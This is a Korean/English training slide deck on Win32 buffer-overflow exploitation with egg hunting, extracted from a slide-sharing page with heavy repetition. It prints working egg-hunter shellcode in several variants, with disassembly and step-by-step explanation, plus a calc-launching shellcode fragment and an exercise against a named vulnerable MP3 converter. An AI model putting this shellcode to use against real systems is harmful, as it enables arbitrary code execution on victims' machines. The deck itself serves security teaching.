Upload
sang-hwan-ahn
View
1.073
Download
3
Embed Size (px)
Citation preview
System Hacking & Reverse Engineering
documented by h2spice [email protected]
[ Buffer Overflow - Egg Hunting ]
Who am I
Sanghwan,Ahn (h2spice)
Works for LINE.Corp
Carrying out research on the vulnerability (exploitation,hunt,analysis)
시스템 해킹 / 리버싱
취약점 원리
Buffer Overflow
Format String Bug
Stack Overflow
Use After Free
Heap Overflow
Heap Overflow
익스플로잇(Win32/*NIX/ARM)
Overwriting RET
Egg Hunting
Overwriting SEH
RTL
ROP
Heap Spraying
취약점 / 악성코드 분석
악성코드 분석
버그 헌팅
X86 ARM
취약점 분석
Software on X86
Mobile
소스코드 분석
퍼징
CVE-XXXX-XXXX
Exploit-DBInj3ct0r - 1337day
리버스 엔지니어링
iOS
Android
커리큘럼 소개
Overwriting .dtors
Overwriting GOT
목차커리큘럼 소개
Track3 - Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP
Heap Spray
Track3-2 *NIX
Overwrite RET
RTL
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
RTL
ROP
Track3. Exploitation
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
What is the Egg-Hunting ?
프로세스의 VAS(Virtual Address Space) 검색 기술 이용
공격가능한 벡터가 아주 작은 크기의 Buffer 만을 제공할때 유용(공격자가 프로그램의 흐름을 제어할 수 있다는 전제하에)
Egg Hunting 은 기본적으로 3가지의 코드로 구성
Egg Hunter Code
Marker or Tag
Arbitrary Shell Code
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
How to work Egg-Hunter Code ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter Code\x66\x81\xCA\xFF\x0F\x42\x52\x6A \x02\x58\xCD\x2E\x3C\x05\x5A\x74 \xEF\xB8 \x77\x30\x30\x74 (marker/tag: w00t)\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7 \xFF\xE7
Shell Code (Calc)\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a
Marker / Tag\x77\x30\x30\x74\x77\x30\x30\x74
(w00tw00t)
How to work Egg-Hunter Code ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter Code\x66\x81\xCA\xFF\x0F\x42\x52\x6A \x02\x58\xCD\x2E\x3C\x05\x5A\x74 \xEF\xB8 \x77\x30\x30\x74 (marker/tag: w00t)\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7 \xFF\xE7
Shell Code (Calc)\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a
Marker / Tag\x77\x30\x30\x74\x77\x30\x30\x74
(w00tw00t)+
How to work Egg-Hunter Code ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter Code\x66\x81\xCA\xFF\x0F\x42\x52\x6A \x02\x58\xCD\x2E\x3C\x05\x5A\x74 \xEF\xB8 \x77\x30\x30\x74 (marker/tag: w00t)\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7 \xFF\xE7
\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49 \x50\x4c\x59\x4e\x4c\x4c\x44\x49
Marker / Tag + Shell Code\x77\x30\x30\x74\x77\x30\x30\x74
(w00tw00t)
How to work Egg-Hunter Code ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter Code\x66\x81\xCA\xFF\x0F\x42\x52\x6A \x02\x58\xCD\x2E\x3C\x05\x5A\x74 \xEF\xB8 \x77\x30\x30\x74 (marker/tag: w00t)\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7 \xFF\xE7
\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49 \x50\x4c\x59\x4e\x4c\x4c\x44\x49
Marker / Tag + Shell Code\x77\x30\x30\x74\x77\x30\x30\x74
(w00tw00t)
! Search Memory & Find Marker
How to work Egg-Hunter Code ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter Code\x66\x81\xCA\xFF\x0F\x42\x52\x6A \x02\x58\xCD\x2E\x3C\x05\x5A\x74 \xEF\xB8 \x77\x30\x30\x74 (marker/tag: w00t)\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7 \xFF\xE7
\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49 \x50\x4c\x59\x4e\x4c\x4c\x44\x49
Marker / Tag + Shell Code\x77\x30\x30\x74\x77\x30\x30\x74
(w00tw00t)
! Search Memory & Find Marker
" Store Marker’s Addr & Jump to there
How to work Egg-Hunter Code ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter Code\x66\x81\xCA\xFF\x0F\x42\x52\x6A \x02\x58\xCD\x2E\x3C\x05\x5A\x74 \xEF\xB8 \x77\x30\x30\x74 (marker/tag: w00t)\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7 \xFF\xE7
\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49 \x50\x4c\x59\x4e\x4c\x4c\x44\x49
Marker / Tag + Shell Code\x77\x30\x30\x74\x77\x30\x30\x74
(w00tw00t)
! Search Memory & Find Marker
# Execute Shell Code
" Store Marker’s Addr & Jump to there
Important in order for Egg-Hunting to work사용자 입력값으로부터 프로그램의 흐름을 제어you must be able to jump to (jmp, call, push/ret) & execute some shellcode Egg-Hunter Code는 예측 가능한 메모리 영역에 위치egg-hunter code must be available in a predictable location (so you can reliably jump to it & execute it)
Marker/Tag은 고유 식별자여야 하며, 최종 쉘코드 앞에 위치 you must prepend the final shell code with a unique string/marker/tag
메모리 검색에 필요한 기술을 테스트하여 특정 시스템에 가장 적합한 기술을 확인(IsBadReadPtr,NtDisplayString,NtAccessCheck/AuditAlarm,NtDisplayString/NtAccessChe ckAndAuditAlarm)you’ll have to test which technique to search memory works for a particular exploit 버퍼의 크기가 Egg-Hunter Code가 삽입 될 만큼의 최소한 크기가 필요the amount of available buffer space can be relatively small, because it will only contain the so-called “egg-hunter” 최종 쉘코드는 임의의 메모리 내 위치(Stack/Heap/Etc)the final shell code must be available somewhere in memory
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using SEH injectionTrack3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
my $egghunter = "\xeb\x21\x59\xb8"."w00t".“\x51\x6a\xff\x33\xdb\x64\x89\x23".“\x6a\x02\x59\x8b\xfb\xf3\xaf\x75".“\x07\xff\xe7\x66\x81\xcb\xff\x0f".“\x43\xeb\xed\xe8\xda\xff\xff\xff".“\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8".“\x83\x04\x08\x06\x58\x83\xc4\x10".“\x50\x33\xc0\xc3";
Egg-hunter Code using SEH injection EB21 jmp short 0x2359 pop ecxB890509050 mov eax,0x50905090 ; this is the Marker51 push ecx6AFF push byte -0x133DB xor ebx,ebx648923 mov [fs:ebx],esp6A02 push byte +0x259 pop ecx8BFB mov edi,ebxF3AF repe scasd7507 jnz 0x20FFE7 jmp edi6681CBFF0F or bx,0xfff43 inc ebxEBED jmp short 0x10E8DAFFFFFF call 0x26A0C push byte +0xc59 pop ecx8B040C mov eax,[esp+ecx]B1B8 mov cl,0xb883040806 add dword [eax+ecx],byte +0x658 pop eax83C410 add esp,byte+0x1050 push eax33C0 xor eax,eaxC3 ret
Egg hunter size = 60 bytes, Egg size = 8 bytes
Egg-Hunter using SEH injectionTrack3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
EB21 jmp short 0x2359 pop ecxB890509050 mov eax,0x50905090 ; this is the Marker51 push ecx6AFF push byte -0x133DB xor ebx,ebx648923 mov [fs:ebx],esp6A02 push byte +0x259 pop ecx8BFB mov edi,ebxF3AF repe scasd7507 jnz 0x20FFE7 jmp edi6681CBFF0F or bx,0xfff43 inc ebxEBED jmp short 0x10E8DAFFFFFF call 0x26A0C push byte +0xc59 pop ecx8B040C mov eax,[esp+ecx]B1B8 mov cl,0xb883040806 add dword [eax+ecx],byte +0x658 pop eax83C410 add esp,byte+0x1050 push eax33C0 xor eax,eaxC3 ret
Egg hunter size = 60 bytes, Egg size = 8 bytes
my $egghunter = "\xeb\x21\x59\xb8"."w00t".“\x51\x6a\xff\x33\xdb\x64\x89\x23".“\x6a\x02\x59\x8b\xfb\xf3\xaf\x75".“\x07\xff\xe7\x66\x81\xcb\xff\x0f".“\x43\xeb\xed\xe8\xda\xff\xff\xff".“\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8".“\x83\x04\x08\x06\x58\x83\xc4\x10".“\x50\x33\xc0\xc3";
Egg-hunter Code using SEH injection! Move marker to EAX
" Repeat until find the Marker
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
my $egghunter = “\x33\xdb\x66\x81"."\xcb\xff\x0f\x43\x6a\x08\x53\xb8"."\x0d\x5b\xe7\x77\xff\xd0\x85\xc0"."\x75\xec\xb8"."w00t".“\x8b\xfb\xaf\x75\xe7\xaf\x75\xe4"."\xff\xe7";
Egg-hunter Code using IsBadReadPtr
Egg-Hunter using IsBadReadPtr33DB xor ebx,ebx6681CBFF0F or bx,0xfff43 inc ebx6A08 push byte +0x853 push ebxB80D5BE777 mov eax,0x77e75b0dFFD0 call eax85C0 test eax,eax75EC jnz 0x2B890509050 mov eax,0x50905090 ; this is the Marker8BFB mov edi,ebxAF scasd75E7 jnz 0x7AF scasd75E4 jnz0x7FFE7 jmp edi
Egg hunter size = 37 bytes, Egg size = 8 bytes
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using IsBadReadPtr33DB xor ebx,ebx6681CBFF0F or bx,0xfff43 inc ebx6A08 push byte +0x853 push ebxB80D5BE777 mov eax,0x77e75b0dFFD0 call eax85C0 test eax,eax75EC jnz 0x2B890509050 mov eax,0x50905090 ; this is the Marker8BFB mov edi,ebxAF scasd75E7 jnz 0x7AF scasd75E4 jnz0x7FFE7 jmp edi
Egg hunter size = 37 bytes, Egg size = 8 bytes
! Move marker to EAX
" Repeat until find the Marker
my $egghunter = “\x33\xdb\x66\x81"."\xcb\xff\x0f\x43\x6a\x08\x53\xb8"."\x0d\x5b\xe7\x77\xff\xd0\x85\xc0"."\x75\xec\xb8"."w00t".“\x8b\xfb\xaf\x75\xe7\xaf\x75\xe4"."\xff\xe7";
Egg-hunter Code using IsBadReadPtr
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
my $egghunter =“\x66\x81\xCA\xFF\x0F\x42\x52\x6A"."\x43\x58\xCD\x2E\x3C\x05\x5A\x74"."\xEF\xB8"."w00t".“\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7"."\xFF\xE7";
Egg-hunter Code using NtDisplayString
Egg-Hunter using NtDisplayString6681CAFF0F or dx,0x0fff42 inc edx52 push edx6A43 push byte +0x4358 pop eaxCD2E int 0x2e3C05 cmp al,0x55A pop edx74EF jz 0x0B890509050 mov eax,0x50905090 ; this is the Marker8BFA mov edi,edxAF scasd75EA jnz 0x5AF scasd75E7 jnz 0x5FFE7 jmp edi
Egg hunter size = 32 bytes, Egg size = 8 bytes
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using NtDisplayString6681CAFF0F or dx,0x0fff42 inc edx52 push edx6A43 push byte +0x4358 pop eaxCD2E int 0x2e3C05 cmp al,0x55A pop edx74EF jz 0x0B890509050 mov eax,0x50905090 ; this is the Marker8BFA mov edi,edxAF scasd75EA jnz 0x5AF scasd75E7 jnz 0x5FFE7 jmp edi
Egg hunter size = 32 bytes, Egg size = 8 bytes
! Move marker to EAX
" Repeat until find the Marker
my $egghunter =“\x66\x81\xCA\xFF\x0F\x42\x52\x6A"."\x43\x58\xCD\x2E\x3C\x05\x5A\x74"."\xEF\xB8"."w00t".“\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7"."\xFF\xE7";
Egg-hunter Code using NtDisplayString
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
my $egghunter =“\x66\x81\xCA\xFF\x0F\x42\x52\x6A"."\x02\x58\xCD\x2E\x3C\x05\x5A\x74"."\xEF\xB8"."w00t".“\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7"."\xFF\xE7";
Egg-hunter Code using NtDisplayString
Egg-Hunter using NtAccessCheck(AndAuditAlarm)6681CAFF0F or dx,0x0fff42 inc edx52 push edx6A02 push byte +0x0258 pop eaxCD2E int 0x2e3C05 cmp al,0x55A pop edx74EF jz 0x0B890509050 mov eax,0x50905090 ; this is the Marker8BFA mov edi,edxAF scasd75EA jnz 0x5AF scasd75E7 jnz 0x5FFE7 jmp edi
Egg hunter size = 32 bytes, Egg size = 8 bytes
NtDisplayString을 이용한 Egg-Hunter 와 비슷한 형태를 가지나, 다른 종류의 에그 헌터로, 위와 같은 형태를 가지고 있다. NtDisplayString을 사용하는 대신, 이 방식은 에그 헌터를 넘겨 받아서 발생할 수 있는 접근 위반을 방지하고자, NtAccessCheckAndAuditAlarm (KiServiceTable 내부의 오프셋 0x02)을 사용한다.
NtAccessCheck에 대한 자세한 내용은 아래 링크 참조 - http://undocumented.rawol.com/sbs-w2k-5-monitoring-native-api-calls.pdf - http://xosmos.net/txt/nativapi.html
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
my $egghunter =“\x66\x81\xCA\xFF\x0F\x42\x52\x6A"."\x02\x58\xCD\x2E\x3C\x05\x5A\x74"."\xEF\xB8"."w00t".“\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7"."\xFF\xE7";
Egg-hunter Code using NtDisplayString
Egg-Hunter using NtAccessCheck(AndAuditAlarm)6681CAFF0F or dx,0x0fff42 inc edx52 push edx6A02 push byte +0x0258 pop eaxCD2E int 0x2e3C05 cmp al,0x55A pop edx74EF jz 0x0B890509050 mov eax,0x50905090 ; this is the Marker8BFA mov edi,edxAF scasd75EA jnz 0x5AF scasd75E7 jnz 0x5FFE7 jmp edi
Egg hunter size = 32 bytes, Egg size = 8 bytes
NtDisplayString을 이용한 Egg-Hunter 와 비슷한 형태를 가지나, 다른 종류의 에그 헌터로, 위와 같은 형태를 가지고 있다. NtDisplayString을 사용하는 대신, 이 방식은 에그 헌터를 넘겨 받아서 발생할 수 있는 접근 위반을 방지하고자, NtAccessCheckAndAuditAlarm (KiServiceTable 내부의 오프셋 0x02)을 사용한다.
NtAccessCheck에 대한 자세한 내용은 아래 링크 참조 - http://undocumented.rawol.com/sbs-w2k-5-monitoring-native-api-calls.pdf - http://xosmos.net/txt/nativapi.html
! Move marker to EAX
" Repeat until find the Marker
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
! 메모리 검색을 시작할 위치 지정
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
" 다음 메모리 검색을 위해 주소 값을 증가
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
# 현재 가리키고 있는 주소값을 스택에 저장
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
$ NtAccessCheckAndAuditAlarm을 위해 0x2 를 EAX 삽입(syscall 인자) 후 syscall 호출
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
% 접근 위반(ACCESS_VIOLATION)이 발생했는지 확인
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
& EDX 값 복구
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
구' 접근위반 발생시 시작점(0x12cd6c)로 이동
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
( Marker 삽입검색대상주소(EDX)를 EDI에 저장 Marker(EAX) 와 검색대상주소(EDI) 비교
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
) Marker 미 발견시 시작점(0x12cd6c)로 이동
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Egg-Hunter using NtAccessCheck(AndAuditAlarm)
🔟 Marker 발견시 해당 지점으로 이동
Final Shellcode
Exercise Time :DTarget Info
Win32
Easy RM to MP3 Converter
v.2.7.3.700
Download Link is (http://outofcontrol.co.kr/vulnApp/EasyRM.zip)
Vulnerability Type
Buffer Overflow (Stack Based)
by Parsing Playlist
Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Exercise Time :DTip
Generate Pattern by using mona plugin (!mona pattern_create 30000)
nop sleds (0x90 * N)
Shell code (windows/exec calc.exe)
